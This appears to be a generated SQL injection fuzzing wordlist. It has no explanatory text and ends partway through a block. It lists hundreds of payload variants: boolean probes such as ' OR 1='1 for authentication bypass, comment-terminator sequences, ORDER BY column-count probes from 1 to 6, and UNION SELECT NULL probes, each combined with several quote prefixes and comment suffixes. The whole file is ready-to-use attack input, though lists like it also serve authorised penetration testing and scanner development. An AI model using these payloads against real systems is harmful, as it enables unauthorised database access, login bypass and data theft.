 AND 1=0 --
 AND 1=0 -- -;
 AND 1=0 -- -
 AND 1=0 #
 AND 1=0 ;
 AND 1=0 ;#
 AND 1=0 /*
' AND 1=0 --
' AND 1=0 -- -;
' AND 1=0 -- -
' AND 1=0 #
' AND 1=0 ;
' AND 1=0 ;#
' AND 1=0 /*
" AND 1=0 --
" AND 1=0 -- -;
" AND 1=0 -- -
" AND 1=0 #
" AND 1=0 ;
" AND 1=0 ;#
" AND 1=0 /*
a" AND 1=0 --
a" AND 1=0 -- -;
a" AND 1=0 -- -
a" AND 1=0 #
a" AND 1=0 ;
a" AND 1=0 ;#
a" AND 1=0 /*
a' AND 1=0 --
a' AND 1=0 -- -;
a' AND 1=0 -- -
a' AND 1=0 #
a' AND 1=0 ;
a' AND 1=0 ;#
a' AND 1=0 /*
test AND 1=0 --
test AND 1=0 -- -;
test AND 1=0 -- -
test AND 1=0 #
test AND 1=0 ;
test AND 1=0 ;#
test AND 1=0 /*
user" AND 1=0 --
user" AND 1=0 -- -;
user" AND 1=0 -- -
user" AND 1=0 #
user" AND 1=0 ;
user" AND 1=0 ;#
user" AND 1=0 /*
user' AND 1=0 --
user' AND 1=0 -- -;
user' AND 1=0 -- -
user' AND 1=0 #
user' AND 1=0 ;
user' AND 1=0 ;#
user' AND 1=0 /*
user AND 1=0 --
user AND 1=0 -- -;
user AND 1=0 -- -
user AND 1=0 #
user AND 1=0 ;
user AND 1=0 ;#
user AND 1=0 /*
 AND 1=1 --
 AND 1=1 -- -;
 AND 1=1 -- -
 AND 1=1 #
 AND 1=1 ;
 AND 1=1 ;#
 AND 1=1 /*
' AND 1=1 --
' AND 1=1 -- -;
' AND 1=1 -- -
' AND 1=1 #
' AND 1=1 ;
' AND 1=1 ;#
' AND 1=1 /*
" AND 1=1 --
" AND 1=1 -- -;
" AND 1=1 -- -
" AND 1=1 #
" AND 1=1 ;
" AND 1=1 ;#
" AND 1=1 /*
a" AND 1=1 --
a" AND 1=1 -- -;
a" AND 1=1 -- -
a" AND 1=1 #
a" AND 1=1 ;
a" AND 1=1 ;#
a" AND 1=1 /*
a' AND 1=1 --
a' AND 1=1 -- -;
a' AND 1=1 -- -
a' AND 1=1 #
a' AND 1=1 ;
a' AND 1=1 ;#
a' AND 1=1 /*
test AND 1=1 --
test AND 1=1 -- -;
test AND 1=1 -- -
test AND 1=1 #
test AND 1=1 ;
test AND 1=1 ;#
test AND 1=1 /*
user" AND 1=1 --
user" AND 1=1 -- -;
user" AND 1=1 -- -
user" AND 1=1 #
user" AND 1=1 ;
user" AND 1=1 ;#
user" AND 1=1 /*
user' AND 1=1 --
user' AND 1=1 -- -;
user' AND 1=1 -- -
user' AND 1=1 #
user' AND 1=1 ;
user' AND 1=1 ;#
user' AND 1=1 /*
user AND 1=1 --
user AND 1=1 -- -;
user AND 1=1 -- -
user AND 1=1 #
user AND 1=1 ;
user AND 1=1 ;#
user AND 1=1 /*
 AND 1='0 --
 AND 1='0 -- -;
 AND 1='0 -- -
 AND 1='0 #
 AND 1='0 ;
 AND 1='0 ;#
 AND 1='0 /*
' AND 1='0 --
' AND 1='0 -- -;
' AND 1='0 -- -
' AND 1='0 #
' AND 1='0 ;
' AND 1='0 ;#
' AND 1='0 /*
" AND 1='0 --
" AND 1='0 -- -;
" AND 1='0 -- -
" AND 1='0 #
" AND 1='0 ;
" AND 1='0 ;#
" AND 1='0 /*
a" AND 1='0 --
a" AND 1='0 -- -;
a" AND 1='0 -- -
a" AND 1='0 #
a" AND 1='0 ;
a" AND 1='0 ;#
a" AND 1='0 /*
a' AND 1='0 --
a' AND 1='0 -- -;
a' AND 1='0 -- -
a' AND 1='0 #
a' AND 1='0 ;
a' AND 1='0 ;#
a' AND 1='0 /*
test AND 1='0 --
test AND 1='0 -- -;
test AND 1='0 -- -
test AND 1='0 #
test AND 1='0 ;
test AND 1='0 ;#
test AND 1='0 /*
user" AND 1='0 --
user" AND 1='0 -- -;
user" AND 1='0 -- -
user" AND 1='0 #
user" AND 1='0 ;
user" AND 1='0 ;#
user" AND 1='0 /*
user' AND 1='0 --
user' AND 1='0 -- -;
user' AND 1='0 -- -
user' AND 1='0 #
user' AND 1='0 ;
user' AND 1='0 ;#
user' AND 1='0 /*
user AND 1='0 --
user AND 1='0 -- -;
user AND 1='0 -- -
user AND 1='0 #
user AND 1='0 ;
user AND 1='0 ;#
user AND 1='0 /*
 AND 1='1 --
 AND 1='1 -- -;
 AND 1='1 -- -
 AND 1='1 #
 AND 1='1 ;
 AND 1='1 ;#
 AND 1='1 /*
' AND 1='1 --
' AND 1='1 -- -;
' AND 1='1 -- -
' AND 1='1 #
' AND 1='1 ;
' AND 1='1 ;#
' AND 1='1 /*
" AND 1='1 --
" AND 1='1 -- -;
" AND 1='1 -- -
" AND 1='1 #
" AND 1='1 ;
" AND 1='1 ;#
" AND 1='1 /*
a" AND 1='1 --
a" AND 1='1 -- -;
a" AND 1='1 -- -
a" AND 1='1 #
a" AND 1='1 ;
a" AND 1='1 ;#
a" AND 1='1 /*
a' AND 1='1 --
a' AND 1='1 -- -;
a' AND 1='1 -- -
a' AND 1='1 #
a' AND 1='1 ;
a' AND 1='1 ;#
a' AND 1='1 /*
test AND 1='1 --
test AND 1='1 -- -;
test AND 1='1 -- -
test AND 1='1 #
test AND 1='1 ;
test AND 1='1 ;#
test AND 1='1 /*
user" AND 1='1 --
user" AND 1='1 -- -;
user" AND 1='1 -- -
user" AND 1='1 #
user" AND 1='1 ;
user" AND 1='1 ;#
user" AND 1='1 /*
user' AND 1='1 --
user' AND 1='1 -- -;
user' AND 1='1 -- -
user' AND 1='1 #
user' AND 1='1 ;
user' AND 1='1 ;#
user' AND 1='1 /*
user AND 1='1 --
user AND 1='1 -- -;
user AND 1='1 -- -
user AND 1='1 #
user AND 1='1 ;
user AND 1='1 ;#
user AND 1='1 /*
 AND 1="0 --
 AND 1="0 -- -;
 AND 1="0 -- -
 AND 1="0 #
 AND 1="0 ;
 AND 1="0 ;#
 AND 1="0 /*
' AND 1="0 --
' AND 1="0 -- -;
' AND 1="0 -- -
' AND 1="0 #
' AND 1="0 ;
' AND 1="0 ;#
' AND 1="0 /*
" AND 1="0 --
" AND 1="0 -- -;
" AND 1="0 -- -
" AND 1="0 #
" AND 1="0 ;
" AND 1="0 ;#
" AND 1="0 /*
a" AND 1="0 --
a" AND 1="0 -- -;
a" AND 1="0 -- -
a" AND 1="0 #
a" AND 1="0 ;
a" AND 1="0 ;#
a" AND 1="0 /*
a' AND 1="0 --
a' AND 1="0 -- -;
a' AND 1="0 -- -
a' AND 1="0 #
a' AND 1="0 ;
a' AND 1="0 ;#
a' AND 1="0 /*
test AND 1="0 --
test AND 1="0 -- -;
test AND 1="0 -- -
test AND 1="0 #
test AND 1="0 ;
test AND 1="0 ;#
test AND 1="0 /*
user" AND 1="0 --
user" AND 1="0 -- -;
user" AND 1="0 -- -
user" AND 1="0 #
user" AND 1="0 ;
user" AND 1="0 ;#
user" AND 1="0 /*
user' AND 1="0 --
user' AND 1="0 -- -;
user' AND 1="0 -- -
user' AND 1="0 #
user' AND 1="0 ;
user' AND 1="0 ;#
user' AND 1="0 /*
user AND 1="0 --
user AND 1="0 -- -;
user AND 1="0 -- -
user AND 1="0 #
user AND 1="0 ;
user AND 1="0 ;#
user AND 1="0 /*
 AND 1="1 --
 AND 1="1 -- -;
 AND 1="1 -- -
 AND 1="1 #
 AND 1="1 ;
 AND 1="1 ;#
 AND 1="1 /*
' AND 1="1 --
' AND 1="1 -- -;
' AND 1="1 -- -
' AND 1="1 #
' AND 1="1 ;
' AND 1="1 ;#
' AND 1="1 /*
" AND 1="1 --
" AND 1="1 -- -;
" AND 1="1 -- -
" AND 1="1 #
" AND 1="1 ;
" AND 1="1 ;#
" AND 1="1 /*
a" AND 1="1 --
a" AND 1="1 -- -;
a" AND 1="1 -- -
a" AND 1="1 #
a" AND 1="1 ;
a" AND 1="1 ;#
a" AND 1="1 /*
a' AND 1="1 --
a' AND 1="1 -- -;
a' AND 1="1 -- -
a' AND 1="1 #
a' AND 1="1 ;
a' AND 1="1 ;#
a' AND 1="1 /*
test AND 1="1 --
test AND 1="1 -- -;
test AND 1="1 -- -
test AND 1="1 #
test AND 1="1 ;
test AND 1="1 ;#
test AND 1="1 /*
user" AND 1="1 --
user" AND 1="1 -- -;
user" AND 1="1 -- -
user" AND 1="1 #
user" AND 1="1 ;
user" AND 1="1 ;#
user" AND 1="1 /*
user' AND 1="1 --
user' AND 1="1 -- -;
user' AND 1="1 -- -
user' AND 1="1 #
user' AND 1="1 ;
user' AND 1="1 ;#
user' AND 1="1 /*
user AND 1="1 --
user AND 1="1 -- -;
user AND 1="1 -- -
user AND 1="1 #
user AND 1="1 ;
user AND 1="1 ;#
user AND 1="1 /*
 OR 1='1 --
 OR 1='1 -- -;
 OR 1='1 -- -
 OR 1='1 #
 OR 1='1 ;
 OR 1='1 ;#
 OR 1='1 /*
' OR 1='1 --
' OR 1='1 -- -;
' OR 1='1 -- -
' OR 1='1 #
' OR 1='1 ;
' OR 1='1 ;#
' OR 1='1 /*
" OR 1='1 --
" OR 1='1 -- -;
" OR 1='1 -- -
" OR 1='1 #
" OR 1='1 ;
" OR 1='1 ;#
" OR 1='1 /*
a" OR 1='1 --
a" OR 1='1 -- -;
a" OR 1='1 -- -
a" OR 1='1 #
a" OR 1='1 ;
a" OR 1='1 ;#
a" OR 1='1 /*
a' OR 1='1 --
a' OR 1='1 -- -;
a' OR 1='1 -- -
a' OR 1='1 #
a' OR 1='1 ;
a' OR 1='1 ;#
a' OR 1='1 /*
test OR 1='1 --
test OR 1='1 -- -;
test OR 1='1 -- -
test OR 1='1 #
test OR 1='1 ;
test OR 1='1 ;#
test OR 1='1 /*
user" OR 1='1 --
user" OR 1='1 -- -;
user" OR 1='1 -- -
user" OR 1='1 #
user" OR 1='1 ;
user" OR 1='1 ;#
user" OR 1='1 /*
user' OR 1='1 --
user' OR 1='1 -- -;
user' OR 1='1 -- -
user' OR 1='1 #
user' OR 1='1 ;
user' OR 1='1 ;#
user' OR 1='1 /*
user OR 1='1 --
user OR 1='1 -- -;
user OR 1='1 -- -
user OR 1='1 #
user OR 1='1 ;
user OR 1='1 ;#
user OR 1='1 /*
 OR 1="1 --
 OR 1="1 -- -;
 OR 1="1 -- -
 OR 1="1 #
 OR 1="1 ;
 OR 1="1 ;#
 OR 1="1 /*
' OR 1="1 --
' OR 1="1 -- -;
' OR 1="1 -- -
' OR 1="1 #
' OR 1="1 ;
' OR 1="1 ;#
' OR 1="1 /*
" OR 1="1 --
" OR 1="1 -- -;
" OR 1="1 -- -
" OR 1="1 #
" OR 1="1 ;
" OR 1="1 ;#
" OR 1="1 /*
a" OR 1="1 --
a" OR 1="1 -- -;
a" OR 1="1 -- -
a" OR 1="1 #
a" OR 1="1 ;
a" OR 1="1 ;#
a" OR 1="1 /*
a' OR 1="1 --
a' OR 1="1 -- -;
a' OR 1="1 -- -
a' OR 1="1 #
a' OR 1="1 ;
a' OR 1="1 ;#
a' OR 1="1 /*
test OR 1="1 --
test OR 1="1 -- -;
test OR 1="1 -- -
test OR 1="1 #
test OR 1="1 ;
test OR 1="1 ;#
test OR 1="1 /*
user" OR 1="1 --
user" OR 1="1 -- -;
user" OR 1="1 -- -
user" OR 1="1 #
user" OR 1="1 ;
user" OR 1="1 ;#
user" OR 1="1 /*
user' OR 1="1 --
user' OR 1="1 -- -;
user' OR 1="1 -- -
user' OR 1="1 #
user' OR 1="1 ;
user' OR 1="1 ;#
user' OR 1="1 /*
user OR 1="1 --
user OR 1="1 -- -;
user OR 1="1 -- -
user OR 1="1 #
user OR 1="1 ;
user OR 1="1 ;#
user OR 1="1 /*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*
--
-- -;
-- -
#
;
;#
/*







'
'
'
'
'
'
'
"
"
"
"
"
"
"
a"
a"
a"
a"
a"
a"
a"
a'
a'
a'
a'
a'
a'
a'
test
test
test
test
test
test
test
user"
user"
user"
user"
user"
user"
user"
user'
user'
user'
user'
user'
user'
user'
user
user
user
user
user
user
user
--
-- -;
-- -
#
;
;#
/*
'--
'-- -;
'-- -
'#
';
';#
'/*
"--
"-- -;
"-- -
"#
";
";#
"/*
a"--
a"-- -;
a"-- -
a"#
a";
a";#
a"/*
a'--
a'-- -;
a'-- -
a'#
a';
a';#
a'/*
test--
test-- -;
test-- -
test#
test;
test;#
test/*
user"--
user"-- -;
user"-- -
user"#
user";
user";#
user"/*
user'--
user'-- -;
user'-- -
user'#
user';
user';#
user'/*
user--
user-- -;
user-- -
user#
user;
user;#
user/*
 ORDER BY 1--
 ORDER BY 1-- -;
 ORDER BY 1-- -
 ORDER BY 1#
 ORDER BY 1;
 ORDER BY 1;#
 ORDER BY 1/*
' ORDER BY 1--
' ORDER BY 1-- -;
' ORDER BY 1-- -
' ORDER BY 1#
' ORDER BY 1;
' ORDER BY 1;#
' ORDER BY 1/*
" ORDER BY 1--
" ORDER BY 1-- -;
" ORDER BY 1-- -
" ORDER BY 1#
" ORDER BY 1;
" ORDER BY 1;#
" ORDER BY 1/*
a" ORDER BY 1--
a" ORDER BY 1-- -;
a" ORDER BY 1-- -
a" ORDER BY 1#
a" ORDER BY 1;
a" ORDER BY 1;#
a" ORDER BY 1/*
a' ORDER BY 1--
a' ORDER BY 1-- -;
a' ORDER BY 1-- -
a' ORDER BY 1#
a' ORDER BY 1;
a' ORDER BY 1;#
a' ORDER BY 1/*
test ORDER BY 1--
test ORDER BY 1-- -;
test ORDER BY 1-- -
test ORDER BY 1#
test ORDER BY 1;
test ORDER BY 1;#
test ORDER BY 1/*
user" ORDER BY 1--
user" ORDER BY 1-- -;
user" ORDER BY 1-- -
user" ORDER BY 1#
user" ORDER BY 1;
user" ORDER BY 1;#
user" ORDER BY 1/*
user' ORDER BY 1--
user' ORDER BY 1-- -;
user' ORDER BY 1-- -
user' ORDER BY 1#
user' ORDER BY 1;
user' ORDER BY 1;#
user' ORDER BY 1/*
user ORDER BY 1--
user ORDER BY 1-- -;
user ORDER BY 1-- -
user ORDER BY 1#
user ORDER BY 1;
user ORDER BY 1;#
user ORDER BY 1/*
 ORDER BY 2--
 ORDER BY 2-- -;
 ORDER BY 2-- -
 ORDER BY 2#
 ORDER BY 2;
 ORDER BY 2;#
 ORDER BY 2/*
' ORDER BY 2--
' ORDER BY 2-- -;
' ORDER BY 2-- -
' ORDER BY 2#
' ORDER BY 2;
' ORDER BY 2;#
' ORDER BY 2/*
" ORDER BY 2--
" ORDER BY 2-- -;
" ORDER BY 2-- -
" ORDER BY 2#
" ORDER BY 2;
" ORDER BY 2;#
" ORDER BY 2/*
a" ORDER BY 2--
a" ORDER BY 2-- -;
a" ORDER BY 2-- -
a" ORDER BY 2#
a" ORDER BY 2;
a" ORDER BY 2;#
a" ORDER BY 2/*
a' ORDER BY 2--
a' ORDER BY 2-- -;
a' ORDER BY 2-- -
a' ORDER BY 2#
a' ORDER BY 2;
a' ORDER BY 2;#
a' ORDER BY 2/*
test ORDER BY 2--
test ORDER BY 2-- -;
test ORDER BY 2-- -
test ORDER BY 2#
test ORDER BY 2;
test ORDER BY 2;#
test ORDER BY 2/*
user" ORDER BY 2--
user" ORDER BY 2-- -;
user" ORDER BY 2-- -
user" ORDER BY 2#
user" ORDER BY 2;
user" ORDER BY 2;#
user" ORDER BY 2/*
user' ORDER BY 2--
user' ORDER BY 2-- -;
user' ORDER BY 2-- -
user' ORDER BY 2#
user' ORDER BY 2;
user' ORDER BY 2;#
user' ORDER BY 2/*
user ORDER BY 2--
user ORDER BY 2-- -;
user ORDER BY 2-- -
user ORDER BY 2#
user ORDER BY 2;
user ORDER BY 2;#
user ORDER BY 2/*
 ORDER BY 3--
 ORDER BY 3-- -;
 ORDER BY 3-- -
 ORDER BY 3#
 ORDER BY 3;
 ORDER BY 3;#
 ORDER BY 3/*
' ORDER BY 3--
' ORDER BY 3-- -;
' ORDER BY 3-- -
' ORDER BY 3#
' ORDER BY 3;
' ORDER BY 3;#
' ORDER BY 3/*
" ORDER BY 3--
" ORDER BY 3-- -;
" ORDER BY 3-- -
" ORDER BY 3#
" ORDER BY 3;
" ORDER BY 3;#
" ORDER BY 3/*
a" ORDER BY 3--
a" ORDER BY 3-- -;
a" ORDER BY 3-- -
a" ORDER BY 3#
a" ORDER BY 3;
a" ORDER BY 3;#
a" ORDER BY 3/*
a' ORDER BY 3--
a' ORDER BY 3-- -;
a' ORDER BY 3-- -
a' ORDER BY 3#
a' ORDER BY 3;
a' ORDER BY 3;#
a' ORDER BY 3/*
test ORDER BY 3--
test ORDER BY 3-- -;
test ORDER BY 3-- -
test ORDER BY 3#
test ORDER BY 3;
test ORDER BY 3;#
test ORDER BY 3/*
user" ORDER BY 3--
user" ORDER BY 3-- -;
user" ORDER BY 3-- -
user" ORDER BY 3#
user" ORDER BY 3;
user" ORDER BY 3;#
user" ORDER BY 3/*
user' ORDER BY 3--
user' ORDER BY 3-- -;
user' ORDER BY 3-- -
user' ORDER BY 3#
user' ORDER BY 3;
user' ORDER BY 3;#
user' ORDER BY 3/*
user ORDER BY 3--
user ORDER BY 3-- -;
user ORDER BY 3-- -
user ORDER BY 3#
user ORDER BY 3;
user ORDER BY 3;#
user ORDER BY 3/*
 ORDER BY 4--
 ORDER BY 4-- -;
 ORDER BY 4-- -
 ORDER BY 4#
 ORDER BY 4;
 ORDER BY 4;#
 ORDER BY 4/*
' ORDER BY 4--
' ORDER BY 4-- -;
' ORDER BY 4-- -
' ORDER BY 4#
' ORDER BY 4;
' ORDER BY 4;#
' ORDER BY 4/*
" ORDER BY 4--
" ORDER BY 4-- -;
" ORDER BY 4-- -
" ORDER BY 4#
" ORDER BY 4;
" ORDER BY 4;#
" ORDER BY 4/*
a" ORDER BY 4--
a" ORDER BY 4-- -;
a" ORDER BY 4-- -
a" ORDER BY 4#
a" ORDER BY 4;
a" ORDER BY 4;#
a" ORDER BY 4/*
a' ORDER BY 4--
a' ORDER BY 4-- -;
a' ORDER BY 4-- -
a' ORDER BY 4#
a' ORDER BY 4;
a' ORDER BY 4;#
a' ORDER BY 4/*
test ORDER BY 4--
test ORDER BY 4-- -;
test ORDER BY 4-- -
test ORDER BY 4#
test ORDER BY 4;
test ORDER BY 4;#
test ORDER BY 4/*
user" ORDER BY 4--
user" ORDER BY 4-- -;
user" ORDER BY 4-- -
user" ORDER BY 4#
user" ORDER BY 4;
user" ORDER BY 4;#
user" ORDER BY 4/*
user' ORDER BY 4--
user' ORDER BY 4-- -;
user' ORDER BY 4-- -
user' ORDER BY 4#
user' ORDER BY 4;
user' ORDER BY 4;#
user' ORDER BY 4/*
user ORDER BY 4--
user ORDER BY 4-- -;
user ORDER BY 4-- -
user ORDER BY 4#
user ORDER BY 4;
user ORDER BY 4;#
user ORDER BY 4/*
 ORDER BY 5--
 ORDER BY 5-- -;
 ORDER BY 5-- -
 ORDER BY 5#
 ORDER BY 5;
 ORDER BY 5;#
 ORDER BY 5/*
' ORDER BY 5--
' ORDER BY 5-- -;
' ORDER BY 5-- -
' ORDER BY 5#
' ORDER BY 5;
' ORDER BY 5;#
' ORDER BY 5/*
" ORDER BY 5--
" ORDER BY 5-- -;
" ORDER BY 5-- -
" ORDER BY 5#
" ORDER BY 5;
" ORDER BY 5;#
" ORDER BY 5/*
a" ORDER BY 5--
a" ORDER BY 5-- -;
a" ORDER BY 5-- -
a" ORDER BY 5#
a" ORDER BY 5;
a" ORDER BY 5;#
a" ORDER BY 5/*
a' ORDER BY 5--
a' ORDER BY 5-- -;
a' ORDER BY 5-- -
a' ORDER BY 5#
a' ORDER BY 5;
a' ORDER BY 5;#
a' ORDER BY 5/*
test ORDER BY 5--
test ORDER BY 5-- -;
test ORDER BY 5-- -
test ORDER BY 5#
test ORDER BY 5;
test ORDER BY 5;#
test ORDER BY 5/*
user" ORDER BY 5--
user" ORDER BY 5-- -;
user" ORDER BY 5-- -
user" ORDER BY 5#
user" ORDER BY 5;
user" ORDER BY 5;#
user" ORDER BY 5/*
user' ORDER BY 5--
user' ORDER BY 5-- -;
user' ORDER BY 5-- -
user' ORDER BY 5#
user' ORDER BY 5;
user' ORDER BY 5;#
user' ORDER BY 5/*
user ORDER BY 5--
user ORDER BY 5-- -;
user ORDER BY 5-- -
user ORDER BY 5#
user ORDER BY 5;
user ORDER BY 5;#
user ORDER BY 5/*
 ORDER BY 6--
 ORDER BY 6-- -;
 ORDER BY 6-- -
 ORDER BY 6#
 ORDER BY 6;
 ORDER BY 6;#
 ORDER BY 6/*
' ORDER BY 6--
' ORDER BY 6-- -;
' ORDER BY 6-- -
' ORDER BY 6#
' ORDER BY 6;
' ORDER BY 6;#
' ORDER BY 6/*
" ORDER BY 6--
" ORDER BY 6-- -;
" ORDER BY 6-- -
" ORDER BY 6#
" ORDER BY 6;
" ORDER BY 6;#
" ORDER BY 6/*
a" ORDER BY 6--
a" ORDER BY 6-- -;
a" ORDER BY 6-- -
a" ORDER BY 6#
a" ORDER BY 6;
a" ORDER BY 6;#
a" ORDER BY 6/*
a' ORDER BY 6--
a' ORDER BY 6-- -;
a' ORDER BY 6-- -
a' ORDER BY 6#
a' ORDER BY 6;
a' ORDER BY 6;#
a' ORDER BY 6/*
test ORDER BY 6--
test ORDER BY 6-- -;
test ORDER BY 6-- -
test ORDER BY 6#
test ORDER BY 6;
test ORDER BY 6;#
test ORDER BY 6/*
user" ORDER BY 6--
user" ORDER BY 6-- -;
user" ORDER BY 6-- -
user" ORDER BY 6#
user" ORDER BY 6;
user" ORDER BY 6;#
user" ORDER BY 6/*
user' ORDER BY 6--
user' ORDER BY 6-- -;
user' ORDER BY 6-- -
user' ORDER BY 6#
user' ORDER BY 6;
user' ORDER BY 6;#
user' ORDER BY 6/*
user ORDER BY 6--
user ORDER BY 6-- -;
user ORDER BY 6-- -
user ORDER BY 6#
user ORDER BY 6;
user ORDER BY 6;#
user ORDER BY 6/*
 UNION SELECT NULL--
 UNION SELECT NULL-- -;
 UNION SELECT NULL-- -
 UNION SELECT NULL#
 UNION SELECT NULL;
 UNION SELECT NULL;#
 UNION SELECT NULL/*
' UNION SELECT NULL--
' UNION SELECT NULL-- -;
' UNION SELECT NULL-- -
' UNION SELECT NULL#
' UNION SELECT NULL;
' UNION SELECT NULL;#
' UNION SELECT NULL/*
" UNION SELECT NULL--
" UNION SELECT NULL-- -;
" UNION SELECT NULL-- -
" UNION SELECT NULL#
" UNION SELECT NULL;
" UNION SELECT NULL;#
" UNION SELECT NULL/*
a" UNION SELECT NULL--
a" UNION SELECT NULL-- -;
a" UNION SELECT NULL-- -
a" UNION SELECT NULL#
a" UNION SELECT NULL;
a" UNION SELECT NULL;#
a" UNION SELECT NULL/*
a' UNION SELECT NULL--
a' UNION SELECT NULL-- -;
a' UNION SELECT NULL-- -
a' UNION SELECT NULL#
a' UNION SELECT NULL;
a' UNION SELECT NULL;#
a' UNION SELECT NULL/*
test UNION SELECT NULL--
test UNION SELECT NULL-- -;
test UNION SELECT NULL-- -
test UNION SELECT NULL#
test UNION SELECT NULL;
test UNION SELECT NULL;#
test UNION SELECT NULL/*
user" UNION SELECT NULL--
user" UNION SELECT NULL-- -;
user" UNION SELECT NULL-- -
user" UNION SELECT NULL#
user" UNION SELECT NULL;
user" UNION SELECT NULL;#
user" UNION SELECT NULL/*
user' UNION SELECT NULL--
user' UNION SELECT NULL-- -;
user' UNION SELECT NULL-- -
user' UNION SELECT NULL#
user' UNION SELECT NULL;
user' UNION SELECT NULL;#
user' UNION SELECT NULL/*
user UNION SELECT NULL--
user UNION SELECT NULL-- -;
user UNION SELECT NULL-- -
user UNION SELECT NULL#
user UNION SELECT NULL;
user UNION SELECT NULL;#
user UNION SELECT NULL/*
 UNION SELECT NULL,NULL--
 UNION SELECT NULL,NULL-- -;
 UNION SELECT NULL,NULL-- -
 UNION SELECT NULL,NULL#
 UNION SELECT NULL,NULL;
 UNION SELECT NULL,NULL;#
 UNION SELECT NULL,NULL/*
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL-- -;
' UNION SELECT NULL,NULL-- -
' UNION SELECT NULL,NULL#
' UNION SELECT NULL,NULL;
' UNION SELECT NULL,NULL;#
' UNION SELECT NULL,NULL/*
" UNION SELECT NULL,NULL--
" UNION SELECT NULL,NULL-- -;
" UNION SELECT NULL,NULL-- -
" UNION SELECT NULL,NULL#
" UNION SELECT NULL,NULL;
" UNION SELECT NULL,NULL;#
" UNION SELECT NULL,NULL/*
a" UNION SELECT NULL,NULL--
a" UNION SELECT NULL,NULL-- -;
a" UNION SELECT NULL,NULL-- -
a" UNION SELECT NULL,NULL#
a" UNION SELECT NULL,NULL;
a" UNION SELECT NULL,NULL;#
a" UNION SELECT NULL,NULL/*
a' UNION SELECT NULL,NULL--
a' UNION SELECT NULL,NULL-- -;
a' UNION SELECT NULL,NULL-- -
a' UNION SELECT NULL,NULL#
a' UNION SELECT NULL,NULL;
a' UNION SELECT NULL,NULL;#
a' UNION SELECT NULL,NULL/*
test UNION SELECT NULL,NULL--
test UNION SELECT NULL,NULL-- -;
test UNION SELECT NULL,NULL-- -
test UNION SELECT NULL,NULL#
test UNION SELECT NULL,NULL;
test UNION SELECT NULL,NULL;#
test UNION SELECT NULL,NULL/*
user" UNION SELECT NULL,NULL--
user" UNION SELECT NULL,NULL-- -;
user" UNION SELECT NULL,NULL-- -
user" UNION SELECT NULL,NULL#
user" UNION SELECT NULL,NULL;
user" UNION SELECT NULL,NULL;#
user" UNION SELECT NULL,NULL/*
user' UNION SELECT NULL,NULL--
user' UNION SELECT NULL,NULL-- -;
user' UNION SELECT NULL,NULL-- -
user' UNION SELECT NULL,NULL#
user' UNION SELECT NULL,NULL;
user' UNION SELECT NULL,NULL;#
user' UNION SELECT NULL,NULL/*
user UNION SELECT NULL,NULL--
user UNION SELECT NULL,NULL-- -;
user UNION SELECT NULL,NULL-- -
user UNION SELECT NULL,NULL#
user UNION SELECT NULL,NULL;
user UNION SELECT NULL,NULL;#
user UNION SELECT NULL,NULL/*
 UNION SELECT NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL/*
a" UNION SELECT NULL,NULL,NULL--
a" UNION SELECT NULL,NULL,NULL-- -;
a" UNION SELECT NULL,NULL,NULL-- -
a" UNION SELECT NULL,NULL,NULL#
a" UNION SELECT NULL,NULL,NULL;
a" UNION SELECT NULL,NULL,NULL;#
a" UNION SELECT NULL,NULL,NULL/*
a' UNION SELECT NULL,NULL,NULL--
a' UNION SELECT NULL,NULL,NULL-- -;
a' UNION SELECT NULL,NULL,NULL-- -
a' UNION SELECT NULL,NULL,NULL#
a' UNION SELECT NULL,NULL,NULL;
a' UNION SELECT NULL,NULL,NULL;#
a' UNION SELECT NULL,NULL,NULL/*
test UNION SELECT NULL,NULL,NULL--
test UNION SELECT NULL,NULL,NULL-- -;
test UNION SELECT NULL,NULL,NULL-- -
test UNION SELECT NULL,NULL,NULL#
test UNION SELECT NULL,NULL,NULL;
test UNION SELECT NULL,NULL,NULL;#
test UNION SELECT NULL,NULL,NULL/*
user" UNION SELECT NULL,NULL,NULL--
user" UNION SELECT NULL,NULL,NULL-- -;
user" UNION SELECT NULL,NULL,NULL-- -
user" UNION SELECT NULL,NULL,NULL#
user" UNION SELECT NULL,NULL,NULL;
user" UNION SELECT NULL,NULL,NULL;#
user" UNION SELECT NULL,NULL,NULL/*
user' UNION SELECT NULL,NULL,NULL--
user' UNION SELECT NULL,NULL,NULL-- -;
user' UNION SELECT NULL,NULL,NULL-- -
user' UNION SELECT NULL,NULL,NULL#
user' UNION SELECT NULL,NULL,NULL;
user' UNION SELECT NULL,NULL,NULL;#
user' UNION SELECT NULL,NULL,NULL/*
user UNION SELECT NULL,NULL,NULL--
user UNION SELECT NULL,NULL,NULL-- -;
user UNION SELECT NULL,NULL,NULL-- -
user UNION SELECT NULL,NULL,NULL#
user UNION SELECT NULL,NULL,NULL;
user UNION SELECT NULL,NULL,NULL;#
user UNION SELECT NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL#
